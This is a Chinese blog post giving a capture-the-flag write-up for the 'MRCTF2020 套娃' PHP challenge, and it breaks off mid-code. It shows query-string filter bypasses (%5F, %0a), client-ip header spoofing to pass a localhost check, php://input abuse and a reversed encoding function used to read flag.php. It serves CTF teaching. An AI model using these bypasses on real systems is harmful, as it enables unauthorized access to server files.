<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="题目地址：MRCTF2020 套娃">
<meta property="og:type" content="article">
<meta property="og:title" content="MRCTF2020 套娃">
<meta property="og:url" content="https://hdfzzf.github.io/2022/04/21/MRCTF2020%20%E5%A5%97%E5%A8%83/index.html">
<meta property="og:site_name" content="HDFZZF&#39;s BLOG">
<meta property="og:description" content="题目地址：MRCTF2020 套娃">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://raw.githubusercontent.com/hdfzzf/Figurebed/main/imgs/20220421094613.png">
<meta property="og:image" content="https://raw.githubusercontent.com/hdfzzf/Figurebed/main/imgs/20220421094919.png">
<meta property="og:image" content="https://raw.githubusercontent.com/hdfzzf/Figurebed/main/imgs/20220421095706.png">
<meta property="article:published_time" content="2022-04-20T16:00:00.000Z">
<meta property="article:modified_time" content="2022-04-21T02:01:18.482Z">
<meta property="article:author" content="hdfzzf">
<meta property="article:tag" content="PHP伪协议">
<meta property="article:tag" content="PHP基础知识">
<meta property="article:tag" content="函数逆向">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://raw.githubusercontent.com/hdfzzf/Figurebed/main/imgs/20220421094613.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/LOGO.jpg">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>MRCTF2020 套娃</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
		<script type="text/x-mathjax-config">
		  MathJax.Hub.Config({
			tex2jax: {
			  skipTags: ['script', 'noscript', 'style', 'textarea', 'pre'],
			  inlineMath: [['$','$']]
			}
		  });
		</script>
		<script src='https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.5/latest.js?config=TeX-MML-AM_CHTML' async></script>
	
<meta name="generator" content="Hexo 6.0.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="القائمة"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="القائمة"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="الأعلى" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">首页</a></li><!--
     --><!--
       --><li><a href="/archives/">归档</a></li><!--
     --><!--
       --><li><a href="/tags/">标签</a></li><!--
     --><!--
       --><li><a href="/categories/">分类</a></li><!--
     --><!--
       --><li><a href="/search/">搜索</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="上一篇" href="/2022/04/22/WUSTCTF2020%20%E9%A2%9C%E5%80%BC%E6%88%90%E7%BB%A9%E6%9F%A5%E8%AF%A2/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="下一篇" href="/2022/04/20/BSidesCF%202019%20Kookie/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="返回顶部" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="分享文章" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">上一篇</span>
      <span id="i-next" class="info" style="display:none;">下一篇</span>
      <span id="i-top" class="info" style="display:none;">返回顶部</span>
      <span id="i-share" class="info" style="display:none;">分享文章</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://hdfzzf.github.io/2022/04/21/MRCTF2020%20%E5%A5%97%E5%A8%83/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://hdfzzf.github.io/2022/04/21/MRCTF2020%20%E5%A5%97%E5%A8%83/&text=MRCTF2020 套娃"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://hdfzzf.github.io/2022/04/21/MRCTF2020%20%E5%A5%97%E5%A8%83/&title=MRCTF2020 套娃"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://hdfzzf.github.io/2022/04/21/MRCTF2020%20%E5%A5%97%E5%A8%83/&is_video=false&description=MRCTF2020 套娃"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=MRCTF2020 套娃&body=Check out this article: https://hdfzzf.github.io/2022/04/21/MRCTF2020%20%E5%A5%97%E5%A8%83/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://hdfzzf.github.io/2022/04/21/MRCTF2020%20%E5%A5%97%E5%A8%83/&title=MRCTF2020 套娃"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://hdfzzf.github.io/2022/04/21/MRCTF2020%20%E5%A5%97%E5%A8%83/&title=MRCTF2020 套娃"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://hdfzzf.github.io/2022/04/21/MRCTF2020%20%E5%A5%97%E5%A8%83/&title=MRCTF2020 套娃"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://hdfzzf.github.io/2022/04/21/MRCTF2020%20%E5%A5%97%E5%A8%83/&title=MRCTF2020 套娃"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://hdfzzf.github.io/2022/04/21/MRCTF2020%20%E5%A5%97%E5%A8%83/&name=MRCTF2020 套娃&description=&lt;p&gt;题目地址：&lt;a href=&#34;https://buuoj.cn/challenges#%5BMRCTF2020%5D套娃&#34;&gt;MRCTF2020 套娃&lt;/a&gt;&lt;/p&gt;"><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://hdfzzf.github.io/2022/04/21/MRCTF2020%20%E5%A5%97%E5%A8%83/&t=MRCTF2020 套娃"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E9%A2%98%E7%9B%AE%E4%BF%A1%E6%81%AF"><span class="toc-number">1.</span> <span class="toc-text">1. 题目信息</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E8%A7%A3%E9%A2%98"><span class="toc-number">2.</span> <span class="toc-text">2. 解题</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%89%8D%E7%BD%AE%E7%9F%A5%E8%AF%86"><span class="toc-number">2.1.</span> <span class="toc-text">2.1. 前置知识</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#server"><span class="toc-number">2.1.1.</span> <span class="toc-text">2.1.1. $_SERVER</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#substr_count"><span class="toc-number">2.1.2.</span> <span class="toc-text">2.1.2. substr_count()</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#preg_matchpattern-string"><span class="toc-number">2.1.3.</span> <span class="toc-text">2.1.3. preg_match(pattern, string)</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#getip"><span class="toc-number">2.1.4.</span> <span class="toc-text">2.1.4. getIp()</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%A7%A3%E9%A2%98%E8%BF%87%E7%A8%8B"><span class="toc-number">2.2.</span> <span class="toc-text">2.2. 解题过程</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%A5%97%E5%A8%831"><span class="toc-number">2.2.1.</span> <span class="toc-text">2.2.1. 套娃1</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%A5%97%E5%A8%832"><span class="toc-number">2.2.2.</span> <span class="toc-text">2.2.2. 套娃2</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%80%BB%E7%BB%93"><span class="toc-number">3.</span> <span class="toc-text">3. 总结</span></a></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        MRCTF2020 套娃
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">hdfzzf</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2022-04-20T16:00:00.000Z" itemprop="datePublished">2022-04-21</time>
        
        (Updated: <time datetime="2022-04-21T02:01:18.482Z" itemprop="dateModified">2022-04-21</time>)
        
      
    </div>


      
    <div class="article-category">
        <i class="fas fa-archive"></i>
        <a class="category-link" href="/categories/CTF/">CTF</a>
    </div>


      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link-link" href="/tags/PHP%E4%BC%AA%E5%8D%8F%E8%AE%AE/" rel="tag">PHP伪协议</a>, <a class="tag-link-link" href="/tags/PHP%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/" rel="tag">PHP基础知识</a>, <a class="tag-link-link" href="/tags/%E5%87%BD%E6%95%B0%E9%80%86%E5%90%91/" rel="tag">函数逆向</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <p>题目地址：<a target="_blank" rel="noopener" href="https://buuoj.cn/challenges#%5BMRCTF2020%5D套娃">MRCTF2020 套娃</a></p>
<span id="more"></span>
<h1 id="题目信息">1. 题目信息</h1>
<p>进入环境查看页面源码： <pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token operator">&lt;</span><span class="token operator">!</span><span class="token operator">--</span>
<span class="token comment">//1st</span>
<span class="token variable">$query</span> <span class="token operator">=</span> <span class="token variable">$_SERVER</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'QUERY_STRING'</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
<span class="token keyword">if</span><span class="token punctuation">(</span><span class="token function">substr_count</span><span class="token punctuation">(</span><span class="token variable">$query</span><span class="token punctuation">,</span> <span class="token string single-quoted-string">'_'</span><span class="token punctuation">)</span> <span class="token operator">!==</span> <span class="token number">0</span> <span class="token operator">||</span> <span class="token class-name">substr_count</span><span class="token punctuation">(</span><span class="token variable">$query</span><span class="token punctuation">,</span> <span class="token string single-quoted-string">'%5f'</span><span class="token punctuation">)</span> <span class="token operator">!=</span> <span class="token number">0</span> <span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
    <span class="token keyword">die</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'Y0u are So cutE!'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span>
<span class="token keyword">if</span><span class="token punctuation">(</span><span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'b_u_p_t'</span><span class="token punctuation">]</span> <span class="token operator">!==</span> <span class="token string single-quoted-string">'23333'</span> <span class="token operator">&amp;&amp;</span> <span class="token function">preg_match</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'/^23333$/'</span><span class="token punctuation">,</span> <span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'b_u_p_t'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
	<span class="token keyword">echo</span> <span class="token string double-quoted-string">"you are going to the next ~"</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span>
<span class="token operator">!</span><span class="token operator">--</span><span class="token operator">></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre></p>
<p>除此之外，没有更多有用的信息了。</p>
<h1 id="解题">2. 解题</h1>
<h2 id="前置知识">2.1. 前置知识</h2>
<h3 id="server">2.1.1. <code>$_SERVER</code></h3>
<blockquote>
<p>$_SERVER 是 PHP 预定义变量之一，可以直接使用，它是一个包含了诸如头信息（header）、路径（path）及脚本位置（script locations）信息的数组。</p>
</blockquote>
<p>参考链接：</p>
<ul>
<li>c.biancheng.net/view/6185.html</li>
</ul>
<p>这里主要介绍一下题目中的<code>$_SERVER['QUERY_STRING']</code>。假设我们的url为 <pre class="line-numbers language-none"><code class="language-none">http:&#x2F;&#x2F;www.hdfzzf.com&#x2F;index.php&#x2F;?name&#x3D;m1ku&amp;city&#x3D;beijing<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre></p>
<p>那么经过<code>$query = $_SERVER['QUERY_STRING'];</code>之后，<code>$query</code>变为： <pre class="line-numbers language-none"><code class="language-none">$query &#x3D; name&#x3D;m1ku&amp;city&#x3D;beijing<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre></p>
<p>即，该代码作用就是获得url中的参数部分。</p>
<h3 id="substr_count">2.1.2. substr_count()</h3>
<p>该函数的作用非常简单，那就是<strong>计算子串在字符串中出现的次数</strong>。</p>
<p>一个例子： <pre class="line-numbers language-php" data-language="php"><code class="language-php">// 计算 Shanghai 在字符串中出现的次数
<span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token keyword">echo</span> <span class="token function">substr_count</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"I love Shanghai. Shanghai is the biggest city in china."</span><span class="token punctuation">,</span><span class="token string double-quoted-string">"Shanghai"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token delimiter important">?></span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre></p>
<p>结果为：2</p>
<p>注意：该函数区分大小写。将上面例子稍作修改： <pre class="line-numbers language-php" data-language="php"><code class="language-php">// 计算 shanghai 在字符串中出现的次数
<span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token keyword">echo</span> <span class="token function">substr_count</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"I love Shanghai. Shanghai is the biggest city in china."</span><span class="token punctuation">,</span><span class="token string double-quoted-string">"shanghai"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token delimiter important">?></span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre></p>
<p>此时结果为：0</p>
<h3 id="preg_matchpattern-string">2.1.3. preg_match(pattern, string)</h3>
<p>PHP中的正则匹配，返回值是匹配次数。<strong>它的值为0或者1</strong>，这是因为第一次匹配到的时候就会结束该函数。如果需要一直搜索到结尾，可以使用preg_match_all(pattern, string)。</p>
<p>需要注意的是，正则匹配默认都是匹配一行的，如果需要匹配多行，需要在正则表达式的最后加上<code>m</code>。</p>
<h3 id="getip">2.1.4. getIp()</h3>
<p>源码如下： <pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token keyword">function</span> <span class="token function-definition function">getIp</span><span class="token punctuation">(</span><span class="token punctuation">)</span>
<span class="token punctuation">&#123;</span>
    <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token variable">$_SERVER</span><span class="token punctuation">[</span><span class="token string double-quoted-string">"HTTP_CLIENT_IP"</span><span class="token punctuation">]</span> <span class="token operator">&amp;&amp;</span> <span class="token function">strcasecmp</span><span class="token punctuation">(</span><span class="token variable">$_SERVER</span><span class="token punctuation">[</span><span class="token string double-quoted-string">"HTTP_CLIENT_IP"</span><span class="token punctuation">]</span><span class="token punctuation">,</span> <span class="token string double-quoted-string">"unknown"</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
        <span class="token variable">$ip</span> <span class="token operator">=</span> <span class="token variable">$_SERVER</span><span class="token punctuation">[</span><span class="token string double-quoted-string">"HTTP_CLIENT_IP"</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
    <span class="token punctuation">&#125;</span> <span class="token keyword">else</span> <span class="token punctuation">&#123;</span>
        <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token variable">$_SERVER</span><span class="token punctuation">[</span><span class="token string double-quoted-string">"HTTP_X_FORWARDED_FOR"</span><span class="token punctuation">]</span> <span class="token operator">&amp;&amp;</span> <span class="token function">strcasecmp</span><span class="token punctuation">(</span><span class="token variable">$_SERVER</span><span class="token punctuation">[</span><span class="token string double-quoted-string">"HTTP_X_FORWARDED_FOR"</span><span class="token punctuation">]</span><span class="token punctuation">,</span> <span class="token string double-quoted-string">"unknown"</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
            <span class="token variable">$ip</span> <span class="token operator">=</span> <span class="token variable">$_SERVER</span><span class="token punctuation">[</span><span class="token string double-quoted-string">"HTTP_X_FORWARDED_FOR"</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
        <span class="token punctuation">&#125;</span> <span class="token keyword">else</span> <span class="token punctuation">&#123;</span>
            <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token variable">$_SERVER</span><span class="token punctuation">[</span><span class="token string double-quoted-string">"REMOTE_ADDR"</span><span class="token punctuation">]</span> <span class="token operator">&amp;&amp;</span> <span class="token function">strcasecmp</span><span class="token punctuation">(</span><span class="token variable">$_SERVER</span><span class="token punctuation">[</span><span class="token string double-quoted-string">"REMOTE_ADDR"</span><span class="token punctuation">]</span><span class="token punctuation">,</span> <span class="token string double-quoted-string">"unknown"</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
                <span class="token variable">$ip</span> <span class="token operator">=</span> <span class="token variable">$_SERVER</span><span class="token punctuation">[</span><span class="token string double-quoted-string">"REMOTE_ADDR"</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
            <span class="token punctuation">&#125;</span> <span class="token keyword">else</span> <span class="token punctuation">&#123;</span>
                <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token keyword">isset</span> <span class="token punctuation">(</span><span class="token variable">$_SERVER</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'REMOTE_ADDR'</span><span class="token punctuation">]</span><span class="token punctuation">)</span> <span class="token operator">&amp;&amp;</span> <span class="token variable">$_SERVER</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'REMOTE_ADDR'</span><span class="token punctuation">]</span> <span class="token operator">&amp;&amp;</span> <span class="token function">strcasecmp</span><span class="token punctuation">(</span><span class="token variable">$_SERVER</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'REMOTE_ADDR'</span><span class="token punctuation">]</span><span class="token punctuation">,</span>
                        <span class="token string double-quoted-string">"unknown"</span><span class="token punctuation">)</span>
                <span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
                    <span class="token variable">$ip</span> <span class="token operator">=</span> <span class="token variable">$_SERVER</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'REMOTE_ADDR'</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
                <span class="token punctuation">&#125;</span> <span class="token keyword">else</span> <span class="token punctuation">&#123;</span>
                    <span class="token variable">$ip</span> <span class="token operator">=</span> <span class="token string double-quoted-string">"unknown"</span><span class="token punctuation">;</span>
                <span class="token punctuation">&#125;</span>
            <span class="token punctuation">&#125;</span>
        <span class="token punctuation">&#125;</span>
    <span class="token punctuation">&#125;</span>
    <span class="token keyword">return</span> <span class="token punctuation">(</span><span class="token variable">$ip</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span>

<span class="token keyword">echo</span> <span class="token function">getIp</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre></p>
<p>简单总结一下就是该函数通过HTTP头部中的<code>client-ip</code>来获取客户端的IP。</p>
<h2 id="解题过程">2.2. 解题过程</h2>
<h3 id="套娃1">2.2.1. 套娃1</h3>
<p>根据代码审计可以知道：</p>
<ul>
<li>要绕过if，即查询语句不能包含<code>_</code>以及<code>%5f</code>，后者就是前者url编码之后的结果；</li>
<li>b_u_p_t的值不能为23333，又得满足preg_match函数的返回值为1</li>
</ul>
<p>因为substr_count()函数区分大小写，因此可以使用大小写绕过，即<code>%5F</code>即可。</p>
<p>而preg_match默认只匹配一行，假设我们输入如下：(%oa是换行符的url编码) <pre class="line-numbers language-none"><code class="language-none">23333%0a<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre></p>
<p>那么preg_match函数只匹配第一行，第一行只有23333，因此满足以23333开头，以23333结尾的要求，从而返回值为1。并且，此时的值不是23333，因为最后有一个换行符，因此绕过强类型匹配。</p>
<p>从而payload为： <pre class="line-numbers language-none"><code class="language-none">?b%5Fu%5Fp%5Ft&#x3D;23333%0a<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre></p>
<p>得到如下提示：</p>
<p><img src="https://raw.githubusercontent.com/hdfzzf/Figurebed/main/imgs/20220421094613.png" /></p>
<h3 id="套娃2">2.2.2. 套娃2</h3>
<p>去访问对应的文件，得到如下提示：（我还以为改一下XFF就可以，天真） <pre class="line-numbers language-none"><code class="language-none">Flag is here~But how to get it?Local access only!  
Sorry,you don&#39;t have permission! Your ip is :sorry,this way is banned!<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre></p>
<p>查看源码，得到一串不知名的注释，这里有一个小技巧，可以将这个注释放入控制台执行。</p>
<p><img src="https://raw.githubusercontent.com/hdfzzf/Figurebed/main/imgs/20220421094919.png" /></p>
<p>因此POST请求，带入参数Merak，得到如下源码： <pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span> 
<span class="token function">error_reporting</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">;</span> 
<span class="token keyword">include</span> <span class="token string single-quoted-string">'takeip.php'</span><span class="token punctuation">;</span>
<span class="token function">ini_set</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'open_basedir'</span><span class="token punctuation">,</span><span class="token string single-quoted-string">'.'</span><span class="token punctuation">)</span><span class="token punctuation">;</span> 
<span class="token keyword">include</span> <span class="token string single-quoted-string">'flag.php'</span><span class="token punctuation">;</span>

<span class="token keyword">if</span><span class="token punctuation">(</span><span class="token keyword">isset</span><span class="token punctuation">(</span><span class="token variable">$_POST</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'Merak'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span> 
    <span class="token function">highlight_file</span><span class="token punctuation">(</span><span class="token constant">__FILE__</span><span class="token punctuation">)</span><span class="token punctuation">;</span> 
    <span class="token keyword">die</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span> 
<span class="token punctuation">&#125;</span> 

<span class="token keyword">function</span> <span class="token function-definition function">change</span><span class="token punctuation">(</span><span class="token variable">$v</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span> 
    <span class="token variable">$v</span> <span class="token operator">=</span> <span class="token function">base64_decode</span><span class="token punctuation">(</span><span class="token variable">$v</span><span class="token punctuation">)</span><span class="token punctuation">;</span> 
    <span class="token variable">$re</span> <span class="token operator">=</span> <span class="token string single-quoted-string">''</span><span class="token punctuation">;</span> 
    <span class="token keyword">for</span><span class="token punctuation">(</span><span class="token variable">$i</span><span class="token operator">=</span><span class="token number">0</span><span class="token punctuation">;</span><span class="token variable">$i</span><span class="token operator">&lt;</span><span class="token function">strlen</span><span class="token punctuation">(</span><span class="token variable">$v</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token variable">$i</span><span class="token operator">++</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span> 
        <span class="token variable">$re</span> <span class="token operator">.=</span> <span class="token function">chr</span> <span class="token punctuation">(</span> <span class="token function">ord</span> <span class="token punctuation">(</span><span class="token variable">$v</span><span class="token punctuation">[</span><span class="token variable">$i</span><span class="token punctuation">]</span><span class="token punctuation">)</span> <span class="token operator">+</span> <span class="token variable">$i</span><span class="token operator">*</span><span class="token number">2</span> <span class="token punctuation">)</span><span class="token punctuation">;</span> 
    <span class="token punctuation">&#125;</span> 
    <span class="token keyword">return</span> <span class="token variable">$re</span><span class="token punctuation">;</span> 
<span class="token punctuation">&#125;</span>
<span class="token keyword">echo</span> <span class="token string single-quoted-string">'Local access only!'</span><span class="token operator">.</span><span class="token string double-quoted-string">"&lt;br/>"</span><span class="token punctuation">;</span>
<span class="token variable">$ip</span> <span class="token operator">=</span> <span class="token function">getIp</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">if</span><span class="token punctuation">(</span><span class="token variable">$ip</span><span class="token operator">!=</span><span class="token string single-quoted-string">'127.0.0.1'</span><span class="token punctuation">)</span>
<span class="token keyword">echo</span> <span class="token string double-quoted-string">"Sorry,you don't have permission!  Your ip is :"</span><span class="token operator">.</span><span class="token variable">$ip</span><span class="token punctuation">;</span>
<span class="token keyword">if</span><span class="token punctuation">(</span><span class="token variable">$ip</span> <span class="token operator">===</span> <span class="token string single-quoted-string">'127.0.0.1'</span> <span class="token operator">&amp;&amp;</span> <span class="token function">file_get_contents</span><span class="token punctuation">(</span><span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'2333'</span><span class="token punctuation">]</span><span class="token punctuation">)</span> <span class="token operator">===</span> <span class="token string single-quoted-string">'todat is a happy day'</span> <span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
<span class="token keyword">echo</span> <span class="token string double-quoted-string">"Your REQUEST is:"</span><span class="token operator">.</span><span class="token function">change</span><span class="token punctuation">(</span><span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'file'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">echo</span> <span class="token function">file_get_contents</span><span class="token punctuation">(</span><span class="token function">change</span><span class="token punctuation">(</span><span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'file'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token punctuation">&#125;</span>
<span class="token delimiter important">?></span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre></p>
<p>从源码中可以得到以下信息：</p>
<ul>
<li>flag应该在flag.php中</li>
<li>这里获得客户端IP不是通过XFF，而是通过client-ip</li>
<li>GET方式传入2333，并且得满足<code>file_get_contents($_GET['2333']) === 'todat is a happy day'</code></li>
<li>利用最后的file_get_contents()读取flag.php中的内容，但是需要经过change()函数</li>
</ul>
<p>第三点可以通过<code>php://input [POSTt] odat is happy day</code>绕过。</p>
<p>这里主要说面一下change函数的绕过。我们的目的是： <pre class="line-numbers language-none"><code class="language-none">change($_GET[&#39;file&#39;]) -&gt; flag.php<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre></p>
<p>即，我们输入payload，经过change函数，变成flag.php。因此我们可以根据change函数写出它的逆过程。代码如下： <pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token keyword">import</span> base64  
<span class="token keyword">def</span> <span class="token function">change</span><span class="token punctuation">(</span>v<span class="token punctuation">)</span><span class="token punctuation">:</span>  
    re <span class="token operator">=</span> <span class="token string">''</span>  
    v <span class="token operator">=</span> base64<span class="token punctuation">.</span>b64decode<span class="token punctuation">(</span>v<span class="token punctuation">)</span><span class="token punctuation">.</span>decode<span class="token punctuation">(</span><span class="token string">'utf-8'</span><span class="token punctuation">)</span> <span class="token comment"># byte -> str  </span>
    <span class="token keyword">for</span> i <span class="token keyword">in</span> <span class="token builtin">range</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">,</span> <span class="token builtin">len</span><span class="token punctuation">(</span>v<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">:</span>  
